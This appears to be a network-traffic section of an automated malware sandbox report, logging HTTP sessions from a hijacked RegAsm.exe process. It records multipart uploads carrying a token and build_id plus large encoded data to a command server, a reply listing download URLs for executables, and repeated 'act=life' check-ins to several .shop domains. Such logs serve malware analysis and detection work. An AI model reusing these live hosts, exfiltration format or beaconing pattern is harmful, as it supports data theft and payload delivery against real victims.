2024-09-26 22:29:01 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIJDAFBKFHIDGCFBFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 114353 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:01 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------AEHIJDAFBKFHIDGCFBFCContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------AEHIJDAFBKFHIDGCFBFCContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------AEHIJDAFBKFHIDGCFBFCCont
2024-09-26 22:29:01 UTC	16355	OUT	Data Raw: 48 55 73 50 6a 4f 66 32 6e 4b 37 6d 68 34 4f 38 51 54 58 4e 33 70 57 68 58 75 54 63 32 56 32 35 6a 62 72 6c 42 44 4b 43 43 66 59 6b 44 36 66 53 71 66 6a 66 38 41 35 47 32 37 2f 77 42 32 50 2f 30 42 61 31 50 43 2f 67 48 56 74 46 38 52 32 6d 6f 33 56 78 5a 76 46 44 76 33 43 4e 33 4c 63 6f 56 47 4d 71 50 55 64 36 79 2f 47 2f 38 41 79 4e 74 35 39 49 2f 2f 41 45 42 61 35 61 4c 70 53 78 79 64 4a 33 56 6e 39 2b 70 70 6a 46 56 6a 6c 7a 56 56 57 66 4d 76 75 30 4f 65 70 4b 57 69 76 61 50 6d 68 4b 4b 57 6b 70 67 54 66 44 32 2b 74 4c 66 57 72 71 79 31 43 34 6a 67 73 74 51 73 35 4c 65 52 35 48 43 71 4d 6a 4f 53 54 78 30 42 48 34 31 32 57 6c 65 49 74 49 76 2f 41 42 68 72 31 72 66 58 74 74 48 70 2f 6d 57 38 6c 71 37 7a 4b 73 65 59 47 47 4e 72 45 34 4f 53 41 66 63 5a 72 Data Ascii: HUsPjOf2nK7mh4O8QTXN3pWhXuTc2V25jbrlBDKCCfYkD6fSqfjf8A5G27/wB2P/0Ba1PC/gHVtF8R2mo3VxZvFDv3CN3LcoVGMqPUd6y/G/8AyNt59I//AEBa5aLpSxydJ3Vn9+ppjFVjlzVVWfMvu0OepKWivaPmhKKWkpgTfD2+tLfWrqy1C4jgstQs5LeR5HCqMjOSTx0BH412WleItIv/ABhr1rfXttHp/mW8lq7zKseYGGNrE4OSAfcZr
2024-09-26 22:29:01 UTC	16355	OUT	Data Raw: 31 37 50 54 52 36 2b 66 51 37 38 75 78 4e 43 6a 43 58 74 64 57 32 74 4f 6c 75 6f 37 54 74 51 6d 31 46 37 46 72 36 47 79 44 72 71 46 6d 41 59 4c 64 49 31 64 4a 5a 4e 72 52 73 46 41 44 63 63 6a 49 4a 34 50 61 73 72 54 74 53 75 4a 50 43 46 78 72 4c 57 69 4e 63 57 49 6c 6a 69 51 4b 6d 32 64 53 56 7a 49 77 50 4c 65 55 58 47 65 44 6e 63 6e 59 47 72 39 79 64 56 6e 69 68 69 5a 62 41 69 33 75 55 75 72 61 53 4b 32 57 41 77 53 72 30 63 4c 48 74 52 6a 77 42 38 36 74 37 59 71 72 62 61 52 64 51 43 31 66 37 57 6f 6b 74 59 57 67 68 41 68 54 59 45 59 48 63 43 75 4d 4e 6e 63 32 63 67 35 7a 7a 58 6e 79 77 6d 4c 6c 4a 38 75 69 36 61 2f 77 42 65 66 33 6e 71 77 78 32 41 68 42 63 2f 76 50 72 70 36 2f 38 41 41 2b 34 30 5a 70 59 37 69 44 53 52 62 6f 6b 42 6a 73 37 5a 64 51 6b 52 Data Ascii: 17PTR6+fQ78uxNCjCXtdW2tOluo7TtQm1F7Fr6GyDrqFmAYLdI1dJZNrRsFADccjIJ4PasrTtSuJPCFxrLWiNcWIljiQKm2dSVzIwPLeUXGeDncnYGr9ydVnihiZbAi3uUuraSK2WAwSr0cLHtRjwB86t7YqrbaRdQC1f7WoktYWghAhTYEYHcCuMNnc2cg5zzXnywmLlJ8ui6a/wBef3nqwx2AhBc/vPrp6/8AA+40ZpY7iDSRbokBjs7ZdQkR
2024-09-26 22:29:01 UTC	16355	OUT	Data Raw: 50 72 6d 76 54 76 44 4f 6c 2b 48 4e 4d 53 5a 39 53 76 49 4a 37 78 4c 73 53 51 7a 67 73 54 74 55 68 6c 49 34 34 79 63 35 46 63 62 34 72 30 73 36 72 34 70 31 47 2b 74 35 6c 4d 4d 30 75 35 44 6a 71 4d 43 76 6d 4a 34 4f 56 53 58 4c 52 68 74 2f 58 55 2b 74 78 46 62 44 30 71 66 4e 4e 72 56 2b 58 6e 32 4f 48 55 7a 4f 52 35 6d 33 41 4f 65 42 55 34 64 77 4d 42 6d 41 39 6a 57 7a 2f 77 41 49 33 50 38 41 38 39 52 2f 33 7a 2f 39 65 6a 2f 68 47 35 2f 2b 65 6f 2f 37 35 2f 38 41 72 30 76 37 4c 78 66 38 6e 34 72 2f 41 44 4f 48 36 2f 68 66 35 6a 47 38 78 2f 37 37 66 6e 57 39 34 61 5a 6d 65 35 33 45 6e 68 65 70 2b 74 52 66 38 49 33 50 2f 77 41 39 52 2f 33 7a 2f 77 44 58 72 54 30 6a 54 48 30 2f 7a 53 37 37 69 2b 4f 33 70 58 5a 6c 2b 41 78 46 4c 45 78 6e 4f 4e 6b 72 39 75 78 Data Ascii: PrmvTvDOl+HNMSZ9SvIJ7xLsSQzgsTtUhlI44yc5Fcb4r0s6r4p1G+t5lMM0u5DjqMCvmJ4OVSXLRht/XU+txFbD0qfNNrV+Xn2OHUzOR5m3AOeBU4dwMBmA9jWz/wAI3P8A89R/3z/9ej/hG5/+eo/75/8Ar0v7Lxf8n4r/ADOH6/hf5jG8x/77fnW94aZme53Enhep+tRf8I3P/wA9R/3z/wDXrT0jTH0/zS77i+O3pXZl+AxFLExnONkr9ux
2024-09-26 22:29:01 UTC	16355	OUT	Data Raw: 37 65 74 43 6c 37 4b 33 4d 30 76 69 37 75 33 59 36 73 56 77 72 37 43 6a 4f 72 37 57 2f 4b 6d 2f 68 37 4b 2f 63 38 2f 6f 6f 6f 72 36 34 2b 52 43 69 69 69 6d 41 55 79 61 56 49 49 57 6c 63 34 56 52 6b 30 2b 71 57 72 66 38 67 79 62 2f 41 49 44 2f 41 4f 68 43 75 66 46 31 58 52 77 38 36 73 64 34 70 76 37 6b 64 2b 56 59 57 47 4c 78 39 44 44 56 50 68 6e 4f 4d 58 36 4e 70 4d 31 62 58 51 2f 45 74 37 62 52 33 4e 76 6f 54 74 44 49 4e 79 46 37 69 4e 43 51 65 68 77 54 6d 70 76 2b 45 5a 38 56 66 39 41 48 2f 77 41 6e 49 76 38 41 47 76 58 67 41 42 67 44 41 48 51 56 54 31 54 55 34 64 4a 73 6a 64 54 4a 4c 49 4e 79 6f 73 63 53 35 64 32 4a 77 41 42 6b 56 38 6f 38 77 78 69 56 33 56 66 33 52 2f 38 41 6b 54 39 43 6a 6c 65 57 54 6c 79 77 77 6b 64 64 76 65 71 66 2f 4a 6e 6c 6a 65 Data Ascii: 7etCl7K3M0vi7u3Y6sVwr7CjOr7W/Km/h7K/c8/ooor64+RCiiimAUyaVIIWlc4VRk0+qWrf8gyb/AID/AOhCufF1XRw86sd4pv7kd+VYWGLx9DDVPhnOMX6NpM1bXQ/Et7bR3NvoTtDINyF7iNCQehwTmpv+EZ8Vf9AH/wAnIv8AGvXgABgDAHQVT1TU4dJsjdTJLINyoscS5d2JwABkV8o8wxiV3Vf3R/8AkT9CjleWTlywwkddveqf/Jnlje
2024-09-26 22:29:01 UTC	16355	OUT	Data Raw: 6f 70 67 4a 52 52 52 51 4d 51 55 55 63 30 55 41 46 4a 53 30 55 41 4a 52 52 52 51 4d 54 76 51 61 4b 53 67 59 55 6c 4c 53 55 44 43 6b 70 61 53 67 41 70 4b 57 6b 6f 47 46 42 6f 70 4b 42 68 52 52 53 47 67 41 6f 4a 6f 70 4b 59 77 6f 6f 70 4b 42 68 53 55 74 4e 4a 6f 42 42 52 52 53 47 67 59 74 4a 6d 69 6b 2b 74 4d 59 5a 6f 70 43 77 70 75 36 6d 4f 77 70 6f 4a 41 70 68 50 72 53 66 6a 52 63 71 77 34 74 54 53 53 61 4b 53 6c 63 64 67 70 4b 4b 4b 43 68 4b 51 30 66 68 52 53 47 46 4a 6e 6d 6c 70 70 6f 41 58 76 53 55 55 47 6d 55 4a 53 55 47 69 67 59 5a 70 70 70 31 4e 4e 49 61 45 6f 6f 4e 48 61 67 61 45 7a 52 51 61 53 6d 4d 53 69 67 30 55 44 45 70 4b 44 52 53 47 68 44 30 6f 6f 70 4b 59 77 6f 6f 70 42 51 4d 50 35 55 68 7a 53 6d 6b 4a 35 6f 47 48 46 4a 31 70 66 70 53 64 66 Data Ascii: opgJRRRQMQUUc0UAFJS0UAJRRRQMTvQaKSgYUlLSUDCkpaSgApKWkoGFBopKBhRRSGgAoJopKYwoopKBhSUtNJoBBRRSGgYtJmik+tMYZopCwpu6mOwpoJAphPrSfjRcqw4tTSSaKSlcdgpKKKChKQ0fhRSGFJnmlppoAXvSUUGmUJSUGigYZppp1NNIaEooNHagaEzRQaSmMSig0UDEpKDRSGhD0oopKYwoopBQMP5UhzSmkJ5oGHFJ1pfpSdf
2024-09-26 22:29:01 UTC	16223	OUT	Data Raw: 77 44 31 55 44 43 6b 6f 39 36 44 31 6f 47 48 61 6b 36 30 47 6a 76 31 6f 41 50 38 39 61 54 50 2b 54 51 61 4b 43 68 4b 44 2b 56 48 61 67 64 71 41 44 50 58 4e 49 54 39 54 52 6e 6d 6a 4e 41 78 4d 59 37 30 55 76 36 2b 2b 4b 51 55 44 45 37 30 47 67 47 69 67 41 50 57 6b 7a 51 4f 74 42 36 55 44 50 51 36 57 6d 6c 67 46 5a 69 47 32 71 51 47 62 61 63 41 6e 6f 43 65 32 63 48 38 71 63 56 6b 57 7a 6b 76 50 4a 6d 4e 72 47 64 72 7a 69 4a 69 69 6e 6a 67 74 6a 41 36 6a 38 36 79 63 34 72 64 6e 79 71 70 7a 6c 73 6d 53 32 39 7a 4e 61 54 72 4e 42 49 55 6b 55 38 4d 4b 36 79 50 78 67 6a 61 61 37 76 43 68 75 30 78 2b 37 62 4f 31 2b 52 6b 67 39 6a 33 72 6b 70 37 65 35 74 54 45 4c 6d 30 75 6f 54 4d 77 53 49 53 77 4f 76 6d 4d 65 67 58 49 35 50 73 4b 72 65 66 47 55 57 54 4a 43 4f 43 Data Ascii: wD1UDCko96D1oGHak60Gjv1oAP89aTP+TQaKChKD+VHagdqADPXNIT9TRnmjNAxMY70Uv6++KQUDE70GgGigAPWkzQOtB6UDPQ6WmlgFZiG2qQGbacAnoCe2cH8qcVkWzkvPJmNrGdrziJiinjgtjA6j86yc4rdnyqpzlsmS29zNaTrNBIUkU8MK6yPxgjaa7vChu0x+7bO1+Rkg9j3rkp7e5tTELm0uoTMwSISwOvmMegXI5PsKrefGUWTJCOC
2024-09-26 22:29:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	57900	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:03 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:03 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 0d 0a 43 6f 6e 74 Data Ascii: ------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------BFCFBFBFBKFIDHJKFCAFCont
2024-09-26 22:29:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:04 UTC	280	IN	Data Raw: 31 30 63 0d 0a 4d 54 49 79 4d 44 67 77 4d 33 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 6a 56 6b 59 6d 46 6a 59 54 4d 30 59 57 4e 66 62 47 5a 6b 62 6e 4e 68 5a 6d 35 6b 63 79 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 44 45 79 4d 6a 41 34 4d 44 52 38 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 63 48 4a 76 5a 79 38 32 4e 6d 59 31 5a 47 49 35 5a 54 55 30 4e 7a 6b 30 58 33 5a 6d 61 32 46 6e 61 33 4d 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 78 4d 6a 49 77 4f 44 41 31 66 47 68 30 64 48 41 36 4c 79 38 78 4e 44 63 75 4e 44 55 75 4e 44 51 75 4d 54 41 30 4c 33 42 79 62 32 63 76 4e 6a 5a 6d 4e 57 52 6c 4e 7a 4a 6b 4f 57 56 69 5a 46 39 79 5a 48 Data Ascii: 10cMTIyMDgwM3xodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZjVkYmFjYTM0YWNfbGZkbnNhZm5kcy5leGV8MXxra2trfDEyMjA4MDR8aHR0cDovLzE0Ny40NS40NC4xMDQvcHJvZy82NmY1ZGI5ZTU0Nzk0X3Zma2Fna3MuZXhlfDF8a2tra3wxMjIwODA1fGh0dHA6Ly8xNDcuNDUuNDQuMTA0L3Byb2cvNjZmNWRlNzJkOWViZF9yZH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	57902	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:06 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBGIIDBKEBFBGCAEBAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:06 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 47 49 49 44 42 4b 45 42 46 42 47 43 41 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 49 49 44 42 4b 45 42 46 42 47 43 41 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 49 49 44 42 4b 45 42 46 42 47 43 41 45 42 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------JEBGIIDBKEBFBGCAEBAKContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------JEBGIIDBKEBFBGCAEBAKContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------JEBGIIDBKEBFBGCAEBAKCont
2024-09-26 22:29:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:07 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	57903	172.67.194.216	443	5480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:06 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: wallkedsleeoi.shop
2024-09-26 22:29:06 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:29:06 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3skd6p9cqa92h5vh327jfsc048; expires=Mon, 20 Jan 2025 16:15:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WTWkO9Aq6n1wgo%2FgwbymT21mxiw8t1qwBrUEIGhRem3KRWt%2Fu7bfMj99bj8gkkTPXyixiQ5kawyETiOvnxYP4x0r55NDAB9XqWOV2os6UA7L3H1mpZH67kDEPV9WrSHFreKiD%2Bw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c96b0dbbaff0ca0-EWR
2024-09-26 22:29:06 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:29:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	57904	104.21.4.136	443	5480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:07 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gutterydhowi.shop
2024-09-26 22:29:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:29:07 UTC	778	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=58ktadr5k4alnbsc0t8hunfrfa; expires=Mon, 20 Jan 2025 16:15:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s0NKLfNJ7E33xE9ttbzAcv6xbvwb%2BJPEaxDA6a5B1hLbU7ZaVk33IfsrxepMtV4v%2F23uoTRURyQ%2BQOb%2BcfGeLivb%2FxcfFFOoeXMnHE8EfksyRblc60knVzbLkBCzr7UfXgQsBA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c96b0e18ba59e04-EWR
2024-09-26 22:29:07 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:29:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	57906	188.114.97.3	443	5480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:08 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ghostreedmnu.shop
2024-09-26 22:29:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:29:08 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1vj6v0ko13ve2m3nofa6c83ce4; expires=Mon, 20 Jan 2025 16:15:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TDf%2B7PBRAqsA6IcZ2vekZjdiZ03rG%2BDt2jo%2FdrcmPPgnH9KB0jfcjYAd3jHtp1IyvH5Uz1bUX89IvtsBspejVCjgHnRFrgEW69dQvorZ0u0QfUT%2B20xYJA5lyzKeDOOGhatNtQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c96b0e7c8e043a7-EWR
2024-09-26 22:29:08 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:29:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	57905	5.75.211.162	443	7032	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:08 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:08 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 63 31 65 61 30 63 36 31 32 66 35 38 30 62 64 30 63 66 64 65 30 36 35 39 30 66 66 31 66 64 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 37 34 32 36 31 64 38 33 34 34 31 33 65 38 38 36 66 39 32 30 61 31 65 39 64 63 35 62 33 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="token"e7c1ea0c612f580bd0cfde06590ff1fd------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="build_id"4b74261d834413e886f920a1e9dc5b33------IEBFHCAKFBGDHIDHIDBKCont
2024-09-26 22:29:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:09 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	57908	188.114.96.3	443	5480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:09 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offensivedzvju.shop
2024-09-26 22:29:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:29:09 UTC	780	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:29:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7tcaa1unciim115d04qhndvff8; expires=Mon, 20 Jan 2025 16:15:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=21UQOaRUnxSJl6P4FC%2BRmOBVeAjrO%2FqnCO1%2BZScMEPG4%2BOxUrru8FuVdBOPSmGRenwAI5Smn1B7TJRtZu%2FfAdN4P4Z1B7WT3sN%2BkrwIpRTFrNnxteBn%2BYro3PHW1MuDqWJ%2FRPQbF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c96b0eebb497c8e-EWR
2024-09-26 22:29:09 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:29:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	57910	188.114.97.3	443	5480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
